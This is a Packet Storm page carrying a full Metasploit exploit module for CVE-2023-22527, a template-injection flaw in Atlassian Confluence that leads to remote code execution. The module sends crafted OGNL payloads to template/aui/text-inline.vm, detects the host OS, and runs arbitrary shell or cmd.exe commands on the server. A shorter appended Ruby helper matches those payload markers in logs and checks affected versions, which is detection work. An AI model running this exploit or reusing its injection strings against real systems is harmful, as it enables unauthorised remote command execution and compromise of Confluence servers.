Atlassian Confluence SSTI Injection

This Metasploit module exploits an SSTI injection in Atlassian Confluence servers. A specially crafted HTTP request uses the injection to evaluate an OGNL expression resulting in OS command execution. Versions 8.5.0 through 8.5.3 and 8.0 to 8.4 are known to be vulnerable.

Packet Storm
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HTTP::Atlassian::Confluence::Version

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Atlassian Confluence SSTI Injection',
        'Description' => %q{
          This module exploits an SSTI injection in Atlassian Confluence servers. A specially crafted HTTP request uses
          the injection to evaluate an OGNL expression resulting in OS command execution.

          Versions 8.5.0 through 8.5.3 and 8.0 to 8.4 are known to be vulnerable.
        },
        'Author' => [
          'Rahul Maini', # ProjectDiscovery analysis
          'Harsh Jaiswal', # ProjectDiscovery analysis
          'Spencer McIntyre'
        ],
        'References' => [
          ['CVE', '2023-22527'],
          ['URL', 'https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html'],
          ['URL', 'https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/']
        ],
        'DisclosureDate' => '2024-01-16', # Atlassian advisory released
        'License' => MSF_LICENSE,
        'Platform' => ['unix', 'linux', 'win'],
        'Arch' => [ARCH_CMD],
        'Privileged' => false,
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => ['unix', 'linux'],
              'Arch' => ARCH_CMD
            }
          ],
          [
            'Windows Command',
            {
              'Platform' => 'win',
              'Arch' => ARCH_CMD,
              'Payload' => { 'Space' => 8191, 'DisableNops' => true }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'RPORT' => 8090
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options([
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])
  end

  def get_confluence_platform
    # this method gets the platform by exploiting CVE-2023-22527
    return @confluence_platform if @confluence_platform

    header = "X-#{Rex::Text.rand_text_alphanumeric(10..15)}"
    ognl = <<~OGNL.gsub(/^\s+/, '').tr("\n", '')
      @org.apache.struts2.ServletActionContext@getResponse().setHeader(
        '#{header}',
        (@java.lang.System@getProperty('os.name'))
      )
    OGNL

    res = inject_ognl(ognl)
    return nil unless res

    # store the result so the early return above actually memoizes it
    @confluence_platform = res.headers[header]
  end

  def check
    confluence_version = get_confluence_version
    return CheckCode::Unknown('Failed to determine the Confluence version.') unless confluence_version

    vprint_status("Detected Confluence version: #{confluence_version}")

    if confluence_version > Rex::Version.new('8.5.3')
      return CheckCode::Safe("Version #{confluence_version} is not affected.")
    end

    confluence_platform = get_confluence_platform
    unless confluence_platform
      return CheckCode::Safe('Failed to test OGNL injection.')
    end

    vprint_status("Detected target platform: #{confluence_platform}")
    CheckCode::Vulnerable('Successfully tested OGNL injection.')
  end

  def exploit
    confluence_platform = get_confluence_platform
    unless confluence_platform
      fail_with(Failure::NotVulnerable, 'The target is not vulnerable.')
    end

    unless confluence_platform.downcase.start_with?('win') == (target['Platform'] == 'win')
      fail_with(Failure::NoTarget, "The target platform '#{confluence_platform}' is incompatible with '#{target.name}'")
    end

    print_status("Executing #{payload_instance.refname} (#{target.name})")
    execute_command(payload.encoded)
  end

  def execute_command(cmd, _opts = {})
    param = rand_text_alphanumeric(6..10)
    # reference a parameter in the OGNL to work around the 200 character length limit
    ognl = <<~OGNL.gsub(/^\s+/, '').tr("\n", '')
      (new freemarker.template.utility.Execute()).exec(
        {@org.apache.struts2.ServletActionContext@getRequest().getParameter('#{param}')}
      )
    OGNL

    if target['Platform'] == 'win'
      vars_post = { param => "cmd.exe /c \"#{cmd}\"" }
    else
      # the command is executed via Runtime.exec, so sh -c "#{cmd}" will not work with all payloads
      # see: https://codewhitesec.blogspot.com/2015/03/sh-or-getting-shell-environment-from.html?m=1
      vars_post = { param => "sh -c $@|sh . echo #{cmd}" }
    end

    inject_ognl(ognl, 'vars_post' => vars_post)
  end

  def inject_ognl(ognl, opts = {})
    opts = opts.clone
    param = rand_text_alphanumeric(6..10)
    final_opts = {
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'template/aui/text-inline.vm'),
      'vars_post' => {
        # label and param are both limited to a 200 character length by default
        'label' => "\\u0027+#request.get(\\u0027.KEY_velocity.struts2.context\\u0027).internalGet(\\u0027ognl\\u0027).findValue(#parameters.#{param},{})+\\u0027",
        param => ognl
      }.merge(opts.delete('vars_post') || {})
    }.merge(opts)

    send_request_cgi(final_opts)
  end
end
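A defender-side companion, added here and not part of the module above or the Metasploit project: it checks a reported Confluence version against the affected ranges stated on this page, and scans logged requests for the shape this module sends (a POST to template/aui/text-inline.vm whose label parameter carries findValue and .KEY_velocity.struts2.context). The request records and IP addresses are constructed samples, and the assumption is that a reverse proxy or WAF in front of Confluence logged request bodies.

```ruby
# Added example (not part of the Metasploit module or project above): triage
# helpers for CVE-2023-22527. Sample request records below are constructed.
require 'cgi'

# Indicators taken from the module: a POST to template/aui/text-inline.vm whose
# 'label' parameter abuses findValue() to evaluate a second parameter as OGNL.
VULN_PATH = %r{/template/aui/text-inline\.vm}i
OGNL_MARKERS = [
  'findValue',
  '.KEY_velocity.struts2.context',
  '@org.apache.struts2.ServletActionContext@',
  'freemarker.template.utility.Execute'
].freeze

# Affected ranges per the text above: 8.0.x to 8.4.x and 8.5.0 through 8.5.3.
def affected_version?(version_string)
  v = Gem::Version.new(version_string)
  v >= Gem::Version.new('8.0.0') && v <= Gem::Version.new('8.5.3')
end

# Percent-decode and fold the \u0027 escapes the module uses, so markers
# match however the payload was encoded on the wire.
def ognl_markers_in(text)
  decoded = CGI.unescape(text.to_s).gsub(/\\u0027/i, "'")
  OGNL_MARKERS.select { |marker| decoded.include?(marker) }
end

# :benign         -> vulnerable template path not touched
# :suspicious     -> path hit but no OGNL markers (body may not have been logged)
# :likely_exploit -> path hit and OGNL markers present
def assess(req)
  return { verdict: :benign, markers: [] } unless req[:uri] =~ VULN_PATH

  markers = ognl_markers_in("#{req[:uri]} #{req[:body]}")
  { verdict: markers.empty? ? :suspicious : :likely_exploit, markers: markers }
end

# Returns only the records worth a second look, with verdict and markers attached.
def hunt(requests)
  requests.map { |r| r.merge(assess(r)) }.reject { |r| r[:verdict] == :benign }
end

# Constructed records, imitating a proxy/WAF log that captured request bodies.
SAMPLE_REQUESTS = [
  { ip: '203.0.113.7', method: 'POST', uri: '/template/aui/text-inline.vm',
    body: 'label=\u0027%2B%23request.get(\u0027.KEY_velocity.struts2.context\u0027)' \
          '.internalGet(\u0027ognl\u0027).findValue(%23parameters.zq8k1,{})%2B\u0027&zq8k1=REDACTED' },
  { ip: '198.51.100.2', method: 'GET', uri: '/template/aui/text-inline.vm', body: '' },
  { ip: '192.0.2.9', method: 'GET', uri: '/login.action', body: '' }
].freeze
hunt(SAMPLE_REQUESTS).each { |r| puts "#{r[:ip]} #{r[:method]} #{r[:uri]} -> #{r[:verdict]} #{r[:markers].inspect}" }
```

A :suspicious hit with no markers is still worth correlating with the Confluence application log, since access logs alone rarely carry POST bodies.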
